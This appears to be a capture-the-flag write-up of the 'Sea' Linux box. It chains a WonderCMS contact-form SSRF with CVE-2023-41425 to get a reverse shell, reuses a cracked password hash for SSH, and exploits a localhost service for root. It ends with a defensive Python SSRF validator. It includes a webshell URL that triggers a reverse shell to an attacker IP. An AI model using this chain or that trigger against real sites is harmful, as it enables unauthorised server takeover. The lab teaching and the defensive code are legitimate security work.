Myles Nieman

Sea

Overview

Sea is an easy Linux box running a PHP-based WonderCMS site. The contact form makes server-side requests — an SSRF vector — that can be pointed at an attacker-hosted payload. WonderCMS is vulnerable to CVE-2023-41425, an authenticated XSS-to-RCE chain; the SSRF bypasses the authentication requirement, delivering the malicious theme and executing a reverse shell as www-data. A credential hash discovered in the CMS database cracks and reuses to a system user account. That user has access to an internal monitoring application running only on localhost, forwarded via SSH and found to be exploitable for root.

Path: WonderCMS SSRF → CVE-2023-41425 RCE → www-data → CMS hash → user pivot → internal service → root.

Enumeration

The scan shows SSH on 22 and a web server on 80. The site is PHP-backed.

Initial recon showing the Sea website running on PHP

Browsing the site reveals a mostly static page with a contact form as the key interactive surface:

The Sea website contact/wave participation form

Testing the contact form shows it makes outbound server-side requests — an SSRF primitive. Submitting a URL pointing to a local listener gets a callback:

The contact form field that accepts a URL for SSRF

Confirming the SSRF callback is received from the server

Probing the application further turns up a /loginURL redirect and a login endpoint:

A login page for the WonderCMS admin panel

WonderCMS login confirmation

The theme and page structure identify the CMS as WonderCMS by turboblack.

Page source or headers identifying WonderCMS

Foothold — CVE-2023-41425 via SSRF

WonderCMS is vulnerable to CVE-2023-41425 — an authenticated theme-upload XSS that achieves RCE by installing a malicious ZIP as a theme. The exploit script from prodigiousMind/CVE-2023-41425 automates the payload. Ordinarily this requires a logged-in admin session, but the contact form SSRF means the server itself — already authenticated as admin — will fetch and trigger the payload:

I generated the exploit payload and hosted it, then submitted the exploit URL into the contact form’s URL field, letting the server-side request deliver it:

The exploit URL being submitted via the contact form SSRF

The server fetches the payload, installs the malicious theme, and executes it:

Reverse shell received from the WonderCMS exploit

With a shell as www-data, the installed theme’s reverse-shell handler is accessible directly:

http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.41&lport=443

Triggering the uploaded webshell to get a persistent shell

User

Enumerating the filesystem from the www-data shell turns up a database file containing a password hash:

The WonderCMS database file containing a bcrypt password hash

Password hash extracted from the CMS database

Checking /home reveals the system users:

/home directory showing user accounts on the box

Cracking the hash offline returns a plaintext password that is reused by one of the system accounts, giving SSH access and the user flag:

Cracked hash and successful SSH login as the user

User flag retrieved

Privilege Escalation — Internal Service

From the user session, ss -tlnp or a process listing reveals an internal web service bound only to localhost:8000:

Internal service listening on localhost:8000

Forwarding the port locally over SSH to examine it:

$ ssh -L 8000:localhost:8000 <user>@sea.htb

SSH local port forward command to expose the internal service

The forwarded service presents a monitoring or analytics web interface:

The internal monitoring application accessible via port forward

After analysis, the service is found to be running as root and accepts input that can be abused for command execution:

Identifying the exploitable input in the internal application

Root

Exploiting the internal service’s vulnerability yields code execution as root:

Root shell obtained via the internal service exploit

Takeaways

  • SSRF can substitute for authentication. When the vulnerable server fetches URLs on behalf of the requester, it carries its own session cookies — turning a “requires login” exploit into an unauthenticated one.
  • CVE-2023-41425 is a theme-upload RCE in WonderCMS that is trivially weaponized; any internet-exposed WonderCMS admin panel (or SSRF path to one) should be treated as a full compromise vector.
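The first takeaway is the one a defender can act on directly: the contact form's URL field was handed to a server-side fetch with no check on where the request would go. The guard below is an added example written for this writeup, not WonderCMS code and not part of the original post; it is in Python rather than PHP so it can run stand-alone, and the function names (validate_fetch_url, is_public_address, default_resolver) and the injectable resolver are assumptions made for illustration. It rejects non-http(s) schemes, userinfo in the URL, and any destination that is loopback, private, link-local (which covers the cloud metadata address), multicast or reserved, and it resolves hostnames first so that a DNS name or a bare-integer host that maps to 127.0.0.1 is refused the same way a literal would be.

```python
"""SSRF guard for a user-supplied URL that the server will fetch.

Added example (hypothetical helper, not WonderCMS code). Assumes the
application stores the contact-form URL as a string and calls
validate_fetch_url() before handing it to its HTTP client.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Resolve a hostname to the set of IP address strings it maps to.

    Uses the system resolver; tests pass a fake resolver so nothing
    touches the network.
    """
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918 / ULA, link-local (including the
    169.254.169.254 metadata range), multicast, reserved and unspecified
    addresses. IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped so it
    cannot smuggle a loopback address past the IPv4 checks.
    """
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def validate_fetch_url(url, resolver=default_resolver):
    """Return (allowed, reason) for a URL the server is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL is not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    # A literal IP is checked directly; anything else goes through DNS so a
    # hostname (or a bare integer like 2130706433, which the system resolver
    # accepts as 127.0.0.1) that maps to loopback is caught the same way.
    try:
        addresses = {str(ipaddress.ip_address(host))}
    except ValueError:
        try:
            addresses = resolver(host)
        except (socket.gaierror, OSError) as exc:
            return False, "resolution failed: %s" % exc
    if not addresses:
        return False, "host resolved to no addresses"
    for addr in addresses:
        if not is_public_address(addr):
            return False, "destination %s is not publicly routable" % addr
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs; the 10.x address is private and is refused.
    for candidate in ("http://127.0.0.1/", "http://10.10.14.41:8000/x.zip",
                      "file:///etc/passwd", "http://93.184.216.34/"):
        print(candidate, validate_fetch_url(candidate))
```

Two caveats belong with the fetch itself rather than the validator. First, the outbound request must not carry the application's own session: with the requests library that means an explicit `cookies={}` (or a fresh `requests.Session()` with no cookie jar populated) rather than reusing whatever client the admin-side code uses, which is exactly the property the takeaway above warns about. Second, validate-then-fetch is a time-of-check/time-of-use gap: either disable redirects (`allow_redirects=False`) and re-run the validator on every Location hop you choose to follow, or connect to the IP that was validated instead of letting the client resolve the name a second time, so a DNS rebinding answer cannot swap in 127.0.0.1 after the check passed.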